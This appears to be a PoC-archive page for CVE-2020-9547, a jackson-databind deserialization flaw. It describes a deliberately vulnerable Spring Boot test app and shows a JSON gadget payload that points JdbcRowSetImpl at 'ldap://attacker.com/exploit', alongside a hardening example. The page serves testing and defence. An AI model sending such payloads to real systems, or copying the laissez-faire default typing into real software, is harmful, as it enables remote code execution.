Related vulnerability
Title:
FasterXML jackson-databind code issue vulnerability
(CVE-2020-9547)
Description: FasterXML jackson-databind is a Java library from FasterXML that converts data formats such as XML and JSON to and from Java objects. Jackson can easily turn Java objects into JSON objects and XML documents, and likewise turn JSON and XML back into Java objects. A code issue vulnerability exists in FasterXML jackson-databind 2.x versions before 2.9.10.4. An attacker can exploit it with a specially crafted request to execute arbitrary code on the system.
Introduction
# CVE-2020-9547 Vulnerable Application
This is a vulnerable Spring Boot application designed to test the CVE-2020-9547 vulnerability in FasterXML jackson-databind.
## Vulnerability Details
- **CVE ID**: CVE-2020-9547
- **Severity**: Critical (CVSS 9.8)
- **Affected Version**: jackson-databind < 2.9.10.4
- **Vulnerability Type**: Deserialization RCE
- **Vulnerable Class**: `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig`
## Setup Instructions
### Prerequisites
- Docker and Docker Compose
- Maven (for building from source)
### Quick Start with Docker
1. **Build and run the application:**
```bash
docker-compose up --build
```
2. **Verify the application is running:**
```bash
curl http://localhost:8080/health
```
### Building from Source
1. **Build the application:**
```bash
mvn clean package
```
2. **Build the Docker image:**
```bash
docker build -t cve-2020-9547-vulnerable-app .
```
3. **Run the container:**
```bash
docker run -p 8080:8080 cve-2020-9547-vulnerable-app
```
## Testing the Vulnerability
### Using Nuclei
1. **Run the nuclei template against the vulnerable application:**
```bash
nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml
```
2. **With interactsh for out-of-band detection:**
```bash
nuclei -u http://localhost:8080 -t http/cves/2020/CVE-2020-9547.yaml -oob
```
### Manual Testing
The application exposes several endpoints that accept JSON payloads:
- `POST /` - Root endpoint
- `POST /api` - API endpoint
- `POST /json` - JSON endpoint
- `PUT /data` - Data endpoint
- `GET /health` - Health check
### Example Vulnerable Payload
```json
{
  "@class": "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
  "properties": {
    "@class": "java.util.HashMap",
    "userTransactionName": {
      "@class": "com.sun.rowset.JdbcRowSetImpl",
      "dataSourceName": "ldap://attacker.com/exploit",
      "autoCommit": true
    }
  }
}
```
## Application Configuration
The vulnerable application is configured with:
- **Jackson Version**: 2.9.10.3 (vulnerable)
- **Polymorphic Type Handling**: Enabled with `LaissezFaireSubTypeValidator`
- **Default Typing**: `NON_FINAL`
- **iBatis SQLMap**: Included for the vulnerable class
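The following is an added example, not code from this repository or from the Jackson project. It writes out the `ObjectMapper` setup the configuration list above describes (`LaissezFaireSubTypeValidator` with `NON_FINAL` default typing, using the Jackson 2.10+ `activateDefaultTyping` API) beside two hardened alternatives, and checks how each treats the shape of the payload in the "Example Vulnerable Payload" section. The payload string is a constructed copy of that payload with a placeholder LDAP host; the package prefix `com.example.model.` is a hypothetical application namespace. The laissez-faire mapper is only constructed and consulted by name; nothing is ever deserialized through it.

```java
// Added example (not the project's code): vulnerable vs. hardened Jackson default typing.
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.JavaType;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.exc.InvalidTypeIdException;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator.Validity;
import com.fasterxml.jackson.databind.jsontype.impl.LaissezFaireSubTypeValidator;

import java.util.Map;

public class DefaultTypingHardening {

    // Constructed sample in the shape of the README's payload; the LDAP host is a placeholder.
    static final String PAYLOAD = "{"
            + "\"@class\":\"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig\","
            + "\"properties\":{"
            + "\"@class\":\"java.util.HashMap\","
            + "\"userTransactionName\":{"
            + "\"@class\":\"com.sun.rowset.JdbcRowSetImpl\","
            + "\"dataSourceName\":\"ldap://placeholder.invalid/x\",\"autoCommit\":true}}}";

    // The validator the README attributes to the vulnerable app: every class name carried
    // in "@class" is accepted, so Jackson's gadget blocklist is the only remaining defence.
    static PolymorphicTypeValidator laissezFaireValidator() {
        return LaissezFaireSubTypeValidator.instance;
    }

    // Hardened: default typing may stay on, but only classes under an application package
    // (hypothetical prefix "com.example.model.") are allowed as polymorphic subtypes.
    static PolymorphicTypeValidator allowlistValidator() {
        return BasicPolymorphicTypeValidator.builder()
                .allowIfSubType("com.example.model.")
                .build();
    }

    // Mapper with global default typing, as in the README's configuration list
    // (@class property, NON_FINAL), parameterised by the validator.
    static ObjectMapper defaultTypingMapper(PolymorphicTypeValidator ptv) {
        return new ObjectMapper().activateDefaultTyping(
                ptv, ObjectMapper.DefaultTyping.NON_FINAL, JsonTypeInfo.As.PROPERTY);
    }

    // Safest option: no default typing at all; "@class" becomes an ordinary map key.
    static ObjectMapper plainMapper() {
        return new ObjectMapper();
    }

    // Ask a validator, by name only (no class loading), whether it would accept a type id.
    // Only ALLOWED lets deserialization proceed; INDETERMINATE is passed on to the
    // class-level check, which the allowlist validator also leaves unmatched, so the
    // type id is rejected before any constructor runs.
    static Validity checkName(PolymorphicTypeValidator ptv, String className) throws Exception {
        ObjectMapper probe = new ObjectMapper();
        JavaType base = probe.constructType(Object.class);
        return ptv.validateSubClassName(probe.getDeserializationConfig(), base, className);
    }

    public static void main(String[] args) throws Exception {
        String gadget = "com.sun.rowset.JdbcRowSetImpl";
        System.out.println("laissez-faire, gadget:  " + checkName(laissezFaireValidator(), gadget));
        System.out.println("allowlist, gadget:      " + checkName(allowlistValidator(), gadget));
        System.out.println("allowlist, app class:   "
                + checkName(allowlistValidator(), "com.example.model.Order"));

        // The hardened mapper refuses the payload's root type id; the iBatis and
        // JdbcRowSetImpl classes are never instantiated.
        try {
            defaultTypingMapper(allowlistValidator()).readValue(PAYLOAD, Object.class);
            System.out.println("UNEXPECTED: payload accepted");
        } catch (InvalidTypeIdException e) {
            System.out.println("rejected type id: " + e.getTypeId());
        }

        // Without default typing the same bytes are inert data.
        Map<?, ?> asData = plainMapper().readValue(PAYLOAD, Map.class);
        System.out.println("plain mapper sees \"@class\" as a string: " + asData.get("@class"));
    }
}
```

Running `main` prints `ALLOWED` for the laissez-faire validator, `INDETERMINATE` for the gadget under the allowlist, `ALLOWED` for the application class, then the rejected type id `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` from the `InvalidTypeIdException`. The point for a fix is that upgrading past 2.9.10.4 only extends the blocklist; the allowlist validator or the plain mapper removes the class of bug rather than one gadget.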
## Security Notice
⚠️ **WARNING**: This application is intentionally vulnerable and should only be used in controlled testing environments. Do not deploy this in production or on public networks.
## Cleanup
To stop and remove the containers:
```bash
docker-compose down
```
To remove the Docker image:
```bash
docker rmi cve-2020-9547-vulnerable-app
```
## References
- [CVE-2020-9547 Details](https://nvd.nist.gov/vuln/detail/CVE-2020-9547)
- [Jackson Databind Issue #2620](https://github.com/FasterXML/jackson-databind/issues/2620)
- [Nuclei Template](http/cves/2020/CVE-2020-9547.yaml)
File snapshot
```
[4.0K] /data/pocs/133d6335f952674947387f4ff766f136ba607f1c
├── [1.1K] build.sh
├── [ 491] docker-compose.yml
├── [ 693] Dockerfile
├── [5.0K] pom.xml
├── [2.8K] README.md
├── [ 357] render.yaml
├── [4.0K] src
│   └── [4.0K] main
│       ├── [4.0K] java
│       │   └── [4.0K] com
│       │       └── [4.0K] example
│       │           └── [ 12K] VulnerableApp.java
│       └── [4.0K] resources
│           └── [ 402] application.properties
├── [1.3K] test-dns.sh
├── [2.4K] test-payloads.json
└── [3.2K] test-vulnerability.sh

6 directories, 11 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has become unavailable or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.